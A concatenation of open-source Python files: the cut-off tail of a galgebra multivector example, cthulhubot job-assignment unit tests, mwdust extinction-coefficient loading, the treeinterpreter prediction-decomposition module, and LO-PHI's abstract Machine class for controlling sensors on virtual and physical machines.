(e1,e2,e3) = MV.setup('e_1 e_2 e_3','[1,1,1]')
v = MV('v', 'vector')
print(v)
(e1,e2,e3) = MV.setup('e*1|2|3','[1,1,1]')
v = MV('v', 'vector')
print(v)
(e1,e2,e3) = MV.setup('e*x|y|z','[1,1,1]')
v = MV('v', 'vector')
print(v)
coords = symbols('x y z')
(e1,e2,e3,grad) = MV.setup('e','[1,1,1]',coords=coords)
v = MV('v', 'vector')
print(v)
return
def dummy():
return
def main():
Get_Program(True)
enhance_print()
MV_setup_options()
return
if __name__ == "__main__":
main()
|
arsenovic/galgebra
|
examples/Old Format/mv_setup_options.py
|
Python
|
bsd-3-clause
| 775
|
from djangosanetesting.cases import UnitTestCase
from djangosanetesting.cases import DatabaseTestCase
from mock import Mock
from unit_project.tests.helpers import (
MockJob, MockBuildComputer, MockProject,
EchoJob, MultipleEchoJob,
register_mock_jobs_and_commands,
)
import os, os.path
from datetime import datetime
from django.utils.simplejson import dumps, loads
from django.core import urlresolvers
from django.core.urlresolvers import get_script_prefix
from buildbot.status.builder import SUCCESS, WARNINGS, FAILURE, SKIPPED, EXCEPTION
from cthulhubot.assignment import Assignment
from cthulhubot.err import RemoteCommandError, UnconfiguredCommandError
from cthulhubot.project import create_project
from cthulhubot.models import Job, JobAssignment, BuildComputer, Command, ProjectClient, Project, Buildmaster
from cthulhubot.views import create_job_assignment
from cthulhubot.mongo import get_database_connection
class TestJobsConfiguration(DatabaseTestCase):
def setUp(self):
super(TestJobsConfiguration, self).setUp()
self._mock_resolver()
register_mock_jobs_and_commands()
job_model = Mock()
self.job = EchoJob(model=job_model)
job_model.get_domain_object.return_value = self.job
computer = MockBuildComputer()
computer.id = 1
project = MockProject()
project.id = 1
assignment_model = Mock()
assignment_model.computer = computer
assignment_model.job = self.job.model
        assignment_model.project = project
assignment_model.config = dumps({})
self.assignment = Assignment(model=assignment_model)
def _mock_resolver(self):
self._original_resolver = urlresolvers.get_resolver
resolver = Mock()
self.prefix = get_script_prefix()
self.mocked_uri = resolver.reverse.return_value="heureka"
urlresolvers.get_resolver = lambda conf: resolver
def _unmock_resolver(self):
urlresolvers.get_resolver = self._original_resolver
def test_unconfigured_job_retrieval(self):
self.assert_raises(UnconfiguredCommandError, self.assignment.get_shell_commands)
def test_loading_empty_configuration_still_raises_error(self):
self.assert_raises(UnconfiguredCommandError, self.assignment.get_shell_commands)
def test_configuration_propageted_to_command(self):
text = 'bazaah!'
self.assignment.model.config = dumps({
'commands' : [
{
'command' : 'cthulhubot-test-helper-echo',
'parameters' : {
'what' : text
}
}
]})
self.assert_equals([['echo', text]], self.assignment.get_shell_commands())
def tearDown(self):
self._unmock_resolver()
super(TestJobsConfiguration, self).tearDown()
class TestCreation(DatabaseTestCase):
def setUp(self):
super(TestCreation, self).setUp()
self._mock_resolver()
self.project_name = u"project"
self.project = create_project(name=self.project_name, tracker_uri="http://example.com", repository_uri="/tmp/project")
self.computer_model = BuildComputer.objects.create(hostname = "localhost")
self.job = Job.objects.create(slug='cthulhubot-sleep').get_domain_object()
self.job.auto_discovery()
def _mock_resolver(self):
self._original_resolver = urlresolvers.get_resolver
resolver = Mock()
self.prefix = get_script_prefix()
self.mocked_uri = resolver.reverse.return_value="heureka"
urlresolvers.get_resolver = lambda conf: resolver
def _unmock_resolver(self):
urlresolvers.get_resolver = self._original_resolver
def create_assignment(self):
self.assignment_model = create_job_assignment(
computer = self.computer_model,
job = self.job,
project = self.project,
).model
def test_client_created_when_missing(self):
self.assertEquals(0, len(ProjectClient.objects.all()))
self.create_assignment()
self.assertEquals(1, len(ProjectClient.objects.all()))
def test_one_client_per_assigned_computer(self):
self.create_assignment()
new_computer = BuildComputer.objects.create(name="blah", hostname="blah")
create_job_assignment(computer = new_computer, job = self.job, project = self.project)
self.assertEquals(2, len(ProjectClient.objects.all()))
def test_identification_generated_from_pk(self):
self.create_assignment()
self.assert_equals(str(self.assignment_model.pk), self.assignment_model.get_identifier())
def test_identification_raises_value_error_when_not_available(self):
assignment = JobAssignment(project=self.project, computer=self.computer_model, job=self.job.model)
self.assert_raises(ValueError, assignment.get_identifier)
def test_client_password_generated(self):
self.create_assignment()
assert len(ProjectClient.objects.all()[0].password) > 0
def test_client_password_not_update_for_multiple_assignments(self):
self.create_assignment()
password = ProjectClient.objects.all()[0].password
self.create_assignment()
self.assert_equals(password, ProjectClient.objects.all()[0].password)
def tearDown(self):
self._unmock_resolver()
super(TestCreation, self).tearDown()
class TestAssignment(UnitTestCase):
def setUp(self):
super(TestAssignment, self).setUp()
register_mock_jobs_and_commands()
self.computer = MockBuildComputer()
self.computer.adapter = Mock()
self.job = MultipleEchoJob()
self.job.model = MockJob()
self.job.model.get_domain_object = Mock()
self.job.model.get_domain_object.return_value = self.job
self.project = MockProject()
self.assignment_model = JobAssignment(pk=1, project=self.project, computer=self.computer, job=self.job.model)
self.assignment = Assignment(model=self.assignment_model)
self._mock_resolver()
def _mock_resolver(self):
self._original_resolver = urlresolvers.get_resolver
resolver = Mock()
self.prefix = get_script_prefix()
self.mocked_uri = resolver.reverse.return_value="heureka"
urlresolvers.get_resolver = lambda conf: resolver
def _unmock_resolver(self):
urlresolvers.get_resolver = self._original_resolver
self._original_resolver = None
def test_job_mocked_properly(self):
self.assert_equals(self.job, self.assignment.job)
def test_url_retrieving(self):
self.assert_equals(self.prefix+self.mocked_uri, self.assignment.get_absolute_url())
def test_configuration_to_factory_propagated_properly(self):
self.assignment.model.config = dumps({
"commands" : [{}, {}, {}],
})
self.assert_equals(["echo", "first"], self.assignment.get_factory().steps[0][1]['command'])
def test_factory_generated_even_when_parameters_not_given(self):
self.assignment.model.config = dumps({
"commands" : [{'command' : 'cthulhubot-test-helper-echo'}, {}, {}],
})
self.assert_equals(["echo", "first"], self.assignment.get_factory().steps[0][1]['command'])
def test_error_raised_when_command_identifier_not_given_for_parameters(self):
self.assignment.model.config = dumps({
"commands" : [
{
'parameters' : {
'what' : 'first'
}
},
{},
{}
],
})
self.assert_raises(ValueError, self.assignment.get_factory)
def test_error_raised_when_bad_command_identifier_given(self):
self.assignment.model.config = dumps({
"commands" : [
{
'command' : 'xxx-bad-command-identifier-for-this-position',
},
{},
{}
],
})
self.assert_raises(ValueError, self.assignment.get_factory)
def tearDown(self):
super(TestAssignment, self).tearDown()
self._unmock_resolver()
class TestAssignmentUpgrades(UnitTestCase):
def setUp(self):
super(TestAssignmentUpgrades, self).setUp()
register_mock_jobs_and_commands()
self.computer = MockBuildComputer()
self.computer.adapter = Mock()
self.job = MultipleEchoJob()
self.job.model = MockJob()
self.job.model.get_domain_object = Mock()
self.job.model.get_domain_object.return_value = self.job
self.project = MockProject()
self.assignment_model = JobAssignment(pk=1, project=self.project, computer=self.computer, job=self.job.model)
self.assignment = Assignment(model=self.assignment_model)
def test_initial_config_version_is_zero(self):
self.assert_equals(0, self.assignment.configuration_version)
def test_initial_job_version_is_zero(self):
self.assert_equals(0, self.assignment.job_version)
def test_upgrading_job_do_not_touch_assignment_configuration(self):
self.assert_equals(0, self.assignment.configuration_version)
def test_upgrades_affects_job_version(self):
self.job.upgrades = [
lambda x: x,
lambda x: x,
]
self.assert_equals(2, self.assignment.job_version)
class TestResults(DatabaseTestCase):
def setUp(self):
super(TestResults, self).setUp()
self._mock_resolver()
self.db = get_database_connection()
self.project_name = u"project"
self.project = Project(name=self.project_name, tracker_uri="http://example.com", repository_uri="/tmp/project")
self.buildmaster = Buildmaster(project=self.project, buildmaster_port=0, webstatus_port=1)
self.computer = BuildComputer(hostname="localhost")
self.job = Job(slug='cthulhubot-sleep').get_domain_object()
self.assignment = JobAssignment(
job = self.job.model,
project = self.project,
computer = self.computer,
).get_domain_object()
self.client = ProjectClient(project=self.project, computer=self.computer)
def _mock_resolver(self):
self._original_resolver = urlresolvers.get_resolver
resolver = Mock()
self.prefix = get_script_prefix()
self.mocked_uri = resolver.reverse.return_value="heureka"
urlresolvers.get_resolver = lambda conf: resolver
def _unmock_resolver(self):
urlresolvers.get_resolver = self._original_resolver
def insert_build(self, time_end=False, time_start=False):
if not time_start:
            time_start = datetime(year=2009, month=1, day=1, hour=12, minute=0, second=0)
        if time_end is False:
            time_end = datetime(year=2009, month=1, day=1, hour=12, minute=0, second=1)
build = {
'builder' : str(self.assignment.get_identifier()),
'slaves' : [self.client.get_name()],
'number' : 1,
'time_start' : time_start,
'time_end' : time_end,
'steps' : [],
}
self.db.builds.insert(build)
return build
def insert_step(self, build, result=False, successful=False, time_end=False, time_start=False):
if result is False:
result = FAILURE
if time_start is False:
            time_start = datetime(year=2009, month=1, day=1, hour=12, minute=0, second=0)
        if time_end is False:
            time_end = datetime(year=2009, month=1, day=1, hour=12, minute=0, second=1)
step = {
'time_start' : time_start,
'time_end' : time_end,
'stdout' : '',
'stderr' : '',
'headers' : '',
'successful' : successful,
'result' : result,
}
self.db.steps.insert(step)
build['steps'].append(step)
self.db.builds.save(build)
return step
def test_build_results_before_first_run(self):
self.assert_equals(u"No result yet", self.assignment.get_last_build_status())
def test_build_results_before_first_run_ended(self):
self.insert_build(time_end=None)
self.assert_equals(u"No result yet", self.assignment.get_last_build_status())
def test_failed_result(self):
        build = self.insert_build(time_end=datetime(year=2009, month=1, day=1, hour=12, minute=0, second=1))
self.insert_step(build)
self.assert_equals(u"Failure", self.assignment.get_last_build_status())
def test_build_retrieved(self):
build = self.insert_build()
self.assert_equals(build, self.assignment.get_builds()[0])
def test_failure_before_success_is_still_fails(self):
build = self.insert_build()
self.insert_step(build)
self.insert_step(build, result=SUCCESS)
self.assert_equals(u"Failure", self.assignment.get_last_build_status())
def test_simple_success(self):
build = self.insert_build()
self.insert_step(build, result=SUCCESS)
self.assert_equals(u"Success", self.assignment.get_last_build_status())
def test_last_finished_build_used_when_last_is_not_finished_yet(self):
        build = self.insert_build(time_end=datetime(year=2009, month=1, day=1, hour=12, minute=0, second=1))
        self.insert_step(build, result=SUCCESS)
        build = self.insert_build(time_start=datetime(year=2009, month=1, day=1, hour=13, minute=0, second=0), time_end=None)
        self.insert_step(build, result=FAILURE, time_start=datetime(year=2009, month=1, day=1, hour=13, minute=0, second=0), time_end=datetime(year=2009, month=1, day=1, hour=13, minute=0, second=1))
        self.insert_step(build, result=None, time_end=None, time_start=datetime(year=2009, month=1, day=1, hour=13, minute=0, second=1))
self.assert_equals(u"Success", self.assignment.get_last_build_status())
|
centrumholdings/cthulhubot
|
tests/unit_project/tests/test_assignment.py
|
Python
|
bsd-3-clause
| 14,108
|
import re
import os, os.path
import numpy
#A / E(B-v)
avebv= {}
avebvsf= {}
def _read_extCurves():
"""Read the extinction curves files in extCurves"""
extFile= open(os.path.join(os.path.dirname(os.path.realpath(__file__)),
'extCurves','extinction.tbl'),'r')
global avebv
global avebvsf
for line in extFile:
if line[0] == '\\': continue
if line[0] == '|': continue
        vals = re.split(r'\s\s+', line)
avebv[vals[0].strip()]= float(vals[4])
avebvsf[vals[0].strip()]= float(vals[2])
# Add filters from Schlafly & Finkbeiner
extFile= open(os.path.join(os.path.dirname(os.path.realpath(__file__)),
'extCurves','apj398709t6_ascii.txt'),'r')
cnt= 0
for line in extFile:
cnt+= 1
if cnt < 6: continue
if cnt > 49: break
vals= line.split()
# Each line has 2 filters
filter1= '%s %s' % (vals[0],vals[1])
if not filter1 in avebv:
avebv[filter1]= numpy.nan
avebvsf[filter1]= float(vals[4])
filter2= '%s %s' % (vals[7],vals[8])
if not filter2 in avebv:
avebv[filter2]= numpy.nan
avebvsf[filter2]= float(vals[11])
_read_extCurves()
def aebv(filter,sf10=True):
"""
NAME:
aebv
PURPOSE:
return A_filter / E(B-V), necessary to turn SFD E(B-V) into total extinctions
INPUT:
filter - filter to use (e.g., '2MASS Ks')
sf10= (True) if True, use the values from Schlafly & Finkbeiner 2010, which use an updated extinction law, source spectrum, and recalibrated SFD map
OUTPUT:
A_filter / E(B-V)
HISTORY:
2013-11-24 - Written - Bovy (IAS)
"""
if sf10:
if not filter in avebvsf:
raise ValueError("Requested filter is not supported")
return avebvsf[filter]
else:
if not filter in avebv:
raise ValueError("Requested filter is not supported")
return avebv[filter]
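# A minimal usage sketch (the E(B-V) value below is a made-up example):
# scale an SFD reddening into a total extinction for a supported filter.
if __name__ == "__main__":
    ebv = 0.05                          # hypothetical SFD E(B-V) [mag]
    a_ks = aebv('2MASS Ks') * ebv       # Schlafly & Finkbeiner 2010 coefficient
    print('A(2MASS Ks) = %.4f mag' % a_ks)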
|
jobovy/mwdust
|
mwdust/util/extCurves.py
|
Python
|
bsd-3-clause
| 2,028
|
# -*- coding: utf-8 -*-
import numpy as np
import sklearn
from sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier, RandomForestRegressor, ExtraTreesRegressor
from sklearn.tree import DecisionTreeRegressor, DecisionTreeClassifier, _tree
from distutils.version import LooseVersion
if LooseVersion(sklearn.__version__) < LooseVersion("0.17"):
raise Exception("treeinterpreter requires scikit-learn 0.17 or later")
def _get_tree_paths(tree, node_id, depth=0):
"""
Returns all paths through the tree as list of node_ids
"""
if node_id == _tree.TREE_LEAF:
raise ValueError("Invalid node_id %s" % _tree.TREE_LEAF)
left_child = tree.children_left[node_id]
right_child = tree.children_right[node_id]
if left_child != _tree.TREE_LEAF:
left_paths = _get_tree_paths(tree, left_child, depth=depth + 1)
right_paths = _get_tree_paths(tree, right_child, depth=depth + 1)
for path in left_paths:
path.append(node_id)
for path in right_paths:
path.append(node_id)
paths = left_paths + right_paths
else:
paths = [[node_id]]
return paths
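# Illustrative example: for a depth-1 stump with root node 0 and leaf
# nodes 1 and 2, _get_tree_paths(tree, 0) returns [[1, 0], [2, 0]] --
# leaf-first paths that _predict_tree reverses into root-to-leaf order.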
def _predict_tree(model, X, joint_contribution=False):
"""
For a given DecisionTreeRegressor, DecisionTreeClassifier,
ExtraTreeRegressor, or ExtraTreeClassifier,
returns a triple of [prediction, bias and feature_contributions], such
that prediction ≈ bias + feature_contributions.
"""
leaves = model.apply(X)
paths = _get_tree_paths(model.tree_, 0)
for path in paths:
path.reverse()
leaf_to_path = {}
#map leaves to paths
for path in paths:
leaf_to_path[path[-1]] = path
# remove the single-dimensional inner arrays
values = model.tree_.value.squeeze(axis=1)
# reshape if squeezed into a single float
if len(values.shape) == 0:
values = np.array([values])
if isinstance(model, DecisionTreeRegressor):
# we require the values to be the same shape as the biases
values = values.squeeze(axis=1)
biases = np.full(X.shape[0], values[paths[0][0]])
line_shape = X.shape[1]
elif isinstance(model, DecisionTreeClassifier):
# scikit stores category counts, we turn them into probabilities
normalizer = values.sum(axis=1)[:, np.newaxis]
normalizer[normalizer == 0.0] = 1.0
values /= normalizer
biases = np.tile(values[paths[0][0]], (X.shape[0], 1))
line_shape = (X.shape[1], model.n_classes_)
direct_prediction = values[leaves]
#make into python list, accessing values will be faster
values_list = list(values)
feature_index = list(model.tree_.feature)
contributions = []
if joint_contribution:
for row, leaf in enumerate(leaves):
path = leaf_to_path[leaf]
path_features = set()
contributions.append({})
for i in range(len(path) - 1):
path_features.add(feature_index[path[i]])
contrib = values_list[path[i+1]] - \
values_list[path[i]]
#path_features.sort()
contributions[row][tuple(sorted(path_features))] = \
contributions[row].get(tuple(sorted(path_features)), 0) + contrib
return direct_prediction, biases, contributions
else:
unique_leaves = np.unique(leaves)
unique_contributions = {}
for row, leaf in enumerate(unique_leaves):
for path in paths:
if leaf == path[-1]:
break
contribs = np.zeros(line_shape)
for i in range(len(path) - 1):
contrib = values_list[path[i+1]] - \
values_list[path[i]]
contribs[feature_index[path[i]]] += contrib
unique_contributions[leaf] = contribs
for row, leaf in enumerate(leaves):
contributions.append(unique_contributions[leaf])
return direct_prediction, biases, np.array(contributions)
def _iterative_mean(iter, current_mean, x):
"""
Iteratively calculates mean using
http://www.heikohoffmann.de/htmlthesis/node134.html
:param iter: non-negative integer, iteration
:param current_mean: numpy array, current value of mean
:param x: numpy array, new value to be added to mean
:return: numpy array, updated mean
"""
return current_mean + ((x - current_mean) / (iter + 1))
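# e.g. averaging [2.0, 4.0, 9.0] one value at a time:
#   _iterative_mean(1, 2.0, 4.0) -> 3.0
#   _iterative_mean(2, 3.0, 9.0) -> 5.0  == np.mean([2.0, 4.0, 9.0])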
def _predict_forest(model, X, joint_contribution=False):
"""
For a given RandomForestRegressor, RandomForestClassifier,
ExtraTreesRegressor, or ExtraTreesClassifier returns a triple of
[prediction, bias and feature_contributions], such that prediction ≈ bias +
feature_contributions.
"""
if joint_contribution:
biases = []
contributions = []
predictions = []
for tree in model.estimators_:
pred, bias, contribution = _predict_tree(tree, X, joint_contribution=joint_contribution)
biases.append(bias)
contributions.append(contribution)
predictions.append(pred)
total_contributions = []
for i in range(len(X)):
contr = {}
for j, dct in enumerate(contributions):
for k in set(dct[i]).union(set(contr.keys())):
contr[k] = (contr.get(k, 0)*j + dct[i].get(k,0) ) / (j+1)
total_contributions.append(contr)
return (np.mean(predictions, axis=0), np.mean(biases, axis=0),
total_contributions)
else:
mean_pred = None
mean_bias = None
mean_contribution = None
for i, tree in enumerate(model.estimators_):
pred, bias, contribution = _predict_tree(tree, X)
if i < 1: # first iteration
mean_bias = bias
mean_contribution = contribution
mean_pred = pred
else:
mean_bias = _iterative_mean(i, mean_bias, bias)
mean_contribution = _iterative_mean(i, mean_contribution, contribution)
mean_pred = _iterative_mean(i, mean_pred, pred)
return mean_pred, mean_bias, mean_contribution
def predict(model, X, joint_contribution=False):
""" Returns a triple (prediction, bias, feature_contributions), such
that prediction ≈ bias + feature_contributions.
Parameters
----------
model : DecisionTreeRegressor, DecisionTreeClassifier,
ExtraTreeRegressor, ExtraTreeClassifier,
RandomForestRegressor, RandomForestClassifier,
ExtraTreesRegressor, ExtraTreesClassifier
Scikit-learn model on which the prediction should be decomposed.
X : array-like, shape = (n_samples, n_features)
Test samples.
joint_contribution : boolean
Specifies if contributions are given individually from each feature,
or jointly over them
Returns
-------
decomposed prediction : triple of
* prediction, shape = (n_samples) for regression and (n_samples, n_classes)
for classification
* bias, shape = (n_samples) for regression and (n_samples, n_classes) for
classification
* contributions, If joint_contribution is False then returns and array of
shape = (n_samples, n_features) for regression or
shape = (n_samples, n_features, n_classes) for classification, denoting
contribution from each feature.
If joint_contribution is True, then shape is array of size n_samples,
where each array element is a dict from a tuple of feature indices to
to a value denoting the contribution from that feature tuple.
"""
    # Only a single output response variable is supported
if model.n_outputs_ > 1:
raise ValueError("Multilabel classification trees not supported")
if (isinstance(model, DecisionTreeClassifier) or
isinstance(model, DecisionTreeRegressor)):
return _predict_tree(model, X, joint_contribution=joint_contribution)
elif (isinstance(model, RandomForestClassifier) or
isinstance(model, ExtraTreesClassifier) or
isinstance(model, RandomForestRegressor) or
isinstance(model, ExtraTreesRegressor)):
return _predict_forest(model, X, joint_contribution=joint_contribution)
else:
raise ValueError("Wrong model type. Base learner needs to be a "
"DecisionTreeClassifier or DecisionTreeRegressor.")
|
andosa/treeinterpreter
|
treeinterpreter/treeinterpreter.py
|
Python
|
bsd-3-clause
| 8,824
|
"""
Abstract machine class to handle all of the interactions with a virtual
or physical machine.
(c) 2015 Massachusetts Institute of Technology
"""
# Native
import os
import shutil
import socket
import logging
import time
import multiprocessing
logger = logging.getLogger(__name__)
# LO-PHI
from lophi.sensors import Sensor
from lophi.sensors.memory import MemorySensor
from lophi.sensors.disk import DiskSensor
from lophi.sensors.control import ControlSensor
from lophi.sensors.cpu import CPUSensor
from lophi.sensors.network import NetworkSensor
import lophi.network.ping as ping
import lophi.globals as G
class Machine:
"""
Abstract class used to control a machine. Physical, Xen, or otherwise.
"""
ALLOCATED = -1
MACHINE_STATE = G.MACHINE_STATES['UNKNOWN']
DISK_STATE = G.DISK_STATES['UNKNOWN']
def __init__(self, machine_config):
"""
Initialize anything that we need and save our config file.
"""
# Ensure that this class is never initialized
if self.__class__ == Machine:
raise("Abstract class initialized directly!")
# Save our config
self.config = machine_config
# initialize our sensors
self.control = None
self.disk = None
self.memory = None
self.cpu = None
self.network = None
self.pxe_server = None
self.images_map = None
self.MUTEX = multiprocessing.Lock()
def _has_sensor(self,name):
"""
See if a sensor was defined
@return: True if a memory sensor exists, False otherwise
"""
if name not in self.__dict__ or self.__dict__[name] is None:
logger.warning("No %s sensor has been defined for %s"%(name,
self.config.name))
return False
else:
return True
def set_volatility_profile(self, profile_name):
"""
Set the profile of this machine.
In a physical system this will change the pxe image that it restores
from, if one exists.
In a virtual system, this will change which base disk image we use.
@param profile_name: Profile name of system, based on Volatility's
naming scheme.
"""
raise NotImplementedError("ERROR: Unimplemented function.")
def get_volatility_profile(self):
"""
Get the volatility profile of this machine
"""
if "volatility_profile" in self.config.__dict__:
return self.config.volatility_profile
else:
return None
def add_sensors(self,sensor_list):
"""
Given a list of all of our initialized sensors this will try to
assign all of those requested by this machine.
"""
if self.type != G.MACHINE_TYPES.PHYSICAL:
logger.debug("Virtual sensors are automatically added, no need to call add_sesnors.")
return
rtn = []
def add(sensor):
""" Add sensor to machine """
if self.add_sensor(sensor):
rtn.append(sensor)
# Mem
add(sensor_list.get(self.config.memory_sensor))
# CPU
add(sensor_list.get(self.config.cpu_sensor))
# Disk
add(sensor_list.get(self.config.disk_sensor))
# Control
add(sensor_list.get(self.config.control_sensor))
# Network
add(sensor_list.get(self.config.network_sensor))
return rtn
def add_sensor(self,sensor):
"""
Add a sensor to our machine
@param sensor: Sensor class will be detected
"""
if sensor is None:
return False
        if sensor.is_assigned():
            logger.error("Tried to add sensor (%s) that was already in use to machine (%s)."%(sensor.id,
                                                                                              self.config.name))
            return False
from lophi.machine.virtual import VirtualMachine
from lophi.machine.physical import PhysicalMachine
# Make sure it's a sensor being added
if not issubclass(sensor.__class__,Sensor):
logger.error("Must only add sensors which are subclasses of Sensor")
return False
# Ensure sensor and machine match
if isinstance(self,VirtualMachine) and str(sensor.__class__).find("physical") != -1:
logger.error("Tried to add physical sensor to virtual machine.")
return False
if isinstance(self,PhysicalMachine) and str(sensor.__class__).find("virtual") != -1:
logger.error("Tried to add virtual sensor to physical machine.")
return False
if issubclass(sensor.__class__,DiskSensor):
self.disk = sensor
elif issubclass(sensor.__class__,ControlSensor):
self.control = sensor
elif issubclass(sensor.__class__,MemorySensor):
self.memory = sensor
elif issubclass(sensor.__class__,CPUSensor):
self.cpu = sensor
elif issubclass(sensor.__class__,NetworkSensor):
self.network = sensor
else:
logger.error("Sensor type %s is not recognized for virtual machines."%
sensor.__class__)
return False
sensor.set_assigned()
return True
def add_pxe_server(self, pxe_server):
"""
Add a PXE server to this machine for resetting machine state.
@param pxe_server: PXE Server object
"""
from lophi.machine.physical import PhysicalMachine
if not isinstance(self,PhysicalMachine):
logger.warn("Tried to add a PXE server a non-physical machine. (%s/%s)"%(self.config.name,self.__class__))
return False
self.pxe_server = pxe_server
# Set our profile so PXE can know what to revert from
self.set_volatility_profile(self.config.volatility_profile)
return True
def add_image_map(self, images_map):
"""
Add a mapping of profile names to disk images (Virtual or physical)
Assumed that the map is only for this machine type
@param images_map: Profile -> Image dict. (For Physical this is the
PXE name, for Virtual this is an actual filename)
"""
logger.debug("Added profile to image map. (%s)"%self.config.name)
self.images_map = images_map
"""
Actuation Functions
"""
def keypress_send(self, keypresses):
"""
Given a list of keypress instructions will emulate them on the SUT.
@param keypresses: list of commands returned from a
KeypressGenerator to send to keyboard emulator
"""
# Check for sensor
if not self._has_sensor("control"):
return
self.control.keypress_send(keypresses)
def keypress_get_generator(self):
"""
Return a generator to convert scripts into a language this sensor
understands
@return: KeypressGeneratorPhysical or KeypressGeneratorVirtual
"""
# Check for sensor
if not self._has_sensor("control"):
return
return self.control.keypress_get_generator()
def mouse_click(self,x,y,button=None,double_click=False):
"""
This will move the mouse the specified (X,Y) coordinate and click
"""
if not self._has_sensor("control"):
return
        return self.control.mouse_click(x, y, button, double_click)
"""
Memory Functions
"""
def memory_read(self, addr, length):
"""
Read physical memory
@param addr: Address to start reading from
@param length: How much memory to read
"""
# Check for sensor
if not self._has_sensor("memory"):
return None
try:
data = self.memory.read(addr,length)
return data
except:
logger.error("Memory read failed. (Addr: 0x%x, Len: %d)"%(addr,length))
G.print_traceback()
return None
def memory_write(self, addr, data):
"""
Write physical memory
@param addr: Address to start writing to
@param data: Data to be written
"""
# Check for sensor
if not self._has_sensor("memory"):
return False
return self.memory.write(addr,data)
def memory_get_size(self):
"""
Get the memory size of our machine
"""
raise NotImplementedError("ERROR: Unimplemented function.")
def memory_dump(self,filename):
"""
Dump the memory of the machine to the given filename
        NOTE: Memory is read and written out in CACHE_CHUNK-sized pieces,
        so the full image is never held in memory at once.
@param filename: Filename to dump a memory image to
"""
try:
f = open(filename,"w+")
except:
logger.error("Could not create %s"%filename)
return False
total_size = self.memory_get_size()
offset = 0
from lophi.sensors.memory import CACHE_CHUNK
rtn = True
while offset < total_size:
memory = self.memory_read(offset, min(CACHE_CHUNK,total_size-offset))
if memory is None:
logger.error("Memory dump failed!")
rtn = False
break
f.write(memory)
offset += CACHE_CHUNK
f.close()
return rtn
"""
Power Functions
"""
def power_on(self):
"""
Power on the machine
"""
# Check for sensor
if not self._has_sensor("control"):
return
logger.debug("Powering on machine. (%s)"%self.config.name)
if self.power_status() != G.SENSOR_CONTROL.POWER_STATUS.ON:
rtn = self.control.power_on()
while rtn and self.power_status() != G.SENSOR_CONTROL.POWER_STATUS.ON:
pass
return rtn
else:
return True
def power_shutdown(self):
"""
Nice shutdown of the VM
"""
# Check for sensor
if not self._has_sensor("control"):
return
logger.debug("Shutting down machine. (%s)"%self.config.name)
        rtn = self.control.power_shutdown()
        # Update state variable
        self.MACHINE_STATE = G.MACHINE_STATES['OFF']
        return rtn
def power_off(self):
"""
Hard shutdown the machine
"""
# Check for sensor
if not self._has_sensor("control"):
return
logger.debug("Powering off machine. (%s)"%self.config.name)
if self.power_status() == G.SENSOR_CONTROL.POWER_STATUS.ON:
rtn = self.control.power_off()
start = time.time()
while rtn and self.power_status() != G.SENSOR_CONTROL.POWER_STATUS.OFF:
time.sleep(1)
if time.time()-start > 10:
logger.error("Machine did not power off after 10 s. Trying again.")
rtn = self.control.power_off()
pass
return rtn
else:
return True
def power_reset(self):
"""
Reset the power on the machine
"""
# Check for sensor
if not self._has_sensor("control"):
return
logger.debug("Resetting machine. (%s)"%self.config.name)
return self.control.power_reset()
def power_reboot(self):
"""
Soft reboot the machine
"""
# Check for sensor
if not self._has_sensor("control"):
return
logger.debug("Rebooting machine. (%s)"%self.config.name)
return self.control.power_reboot()
def power_status(self):
"""
Get the power status of the machine.
@return: ON, OFF, UNKNOWN
"""
# Check for sensor
if not self._has_sensor("control"):
return
status = self.control.power_status()
logger.debug("Getting power status of machine. (%s/%s)"%(self.config.name,status))
return status
"""
Machine Control Functions
"""
def machine_create(self, paused=False):
"""
configure a new machine from the specified config file.
"""
raise NotImplementedError("ERROR: Unimplemented function.")
def machine_pause(self):
"""
Pause a machine
"""
raise NotImplementedError("ERROR: Unimplemented function.")
def machine_resume(self):
"""
Resume a paused machine
"""
raise NotImplementedError("ERROR: Unimplemented function.")
"""
Snapshot Functions
"""
def machine_save(self):
"""
Suspends machine and saves state to a file.
"""
raise NotImplementedError("ERROR: Unimplemented function.")
def machine_restore(self, paused=False):
"""
Restore a machine from our saved state and start it
"""
raise NotImplementedError("ERROR: Unimplemented function.")
def machine_snapshot(self):
"""
Takes a snapshot of the machine and freezes it temporarily.
"""
raise NotImplementedError("ERROR: Unimplemented function.")
def machine_snapshot_restore(self):
"""
Restore a machine from our snapshotted state and start it
"""
raise NotImplementedError("ERROR: Unimplemented function.")
def machine_reset(self):
"""
Reset the machine back to the original state of the snapshot
"""
# Check for sensor
if not self._has_sensor("control"):
return
        # Ensure that our machine is powered down
if self.control.power_status() != G.SENSOR_CONTROL.POWER_STATUS.OFF:
logger.debug("Powering down machine...")
self.control.power_off()
# Revert our disk
logger.debug("Reverting disk...")
return self.disk_revert()
"""
Disk Functions
"""
def disk_revert(self):
"""
Overwrite the disk with a backup of our most recent snapshot
"""
raise NotImplementedError("ERROR: Unimplemented function.")
def disk_get_packet(self):
"""
Get the next DiskSensorPacket off the wire.
@return: DiskSensorPacket
"""
return self.disk.get_disk_packet()
"""
Network Functions
"""
def network_get_ip(self):
"""
Looks up IP address from our DHCP server
@return: ASCII IP address or None
"""
raise NotImplementedError("ERROR: Unimplemented function.")
def network_get_status(self):
"""
Get the network status of this machine
Returns True if machine is up, and False otherwise
@return: True for UP, False for DOWN
"""
ip = self.network_get_ip()
if ip is None:
logger.debug("Cannot get net status -- don't know this machine's IP!")
return False
# Use ping to determine if the machine is up
logger.debug("Pinging %s..."%ip)
resp = ping.echo(ip, timeout=1)
if resp:
return True
else:
return False
def network_read(self):
"""
Read a network packet from our network sensor
@return: (timestamp,packet) tuple for the next network packet on
the wire.
"""
# Check for sensor
if not self._has_sensor("network"):
return None
return self.network.read()
def network_write(self,data):
"""
Write a raw network packet to the interface
@param data: Raw network packet
"""
# Check for sensor
if not self._has_sensor("network"):
return None
return self.network.write(data)
"""
Miscellaneous Functions
"""
def screenshot(self,filename,vol_uri=None):
"""
Screenshot the display of the machine and save it to a file.
@param filename: Filename to save screenshot data to.
@param vol_uri: Just here to be compatible with Physical
"""
raise NotImplementedError("ERROR: Unimplemented function.")
# Useful debug type stuff
def __str__(self):
"""
Just output a nice pretty string of our params
"""
rtn = "[%s]\n" % self.config.name
rtn += " ALLOCATED=%s\n" % (self.ALLOCATED)
rtn += " STATE=%s\n" % (self.MACHINE_STATE)
rtn += " DISK_STATE=%s\n" % (self.DISK_STATE)
rtn += " MACHINE_TYPE=%s\n" % (self.type)
for k in self.config.__dict__.keys():
if k is not "name":
rtn += " %s=%s\n" % (k, self.config.__dict__[k])
return rtn
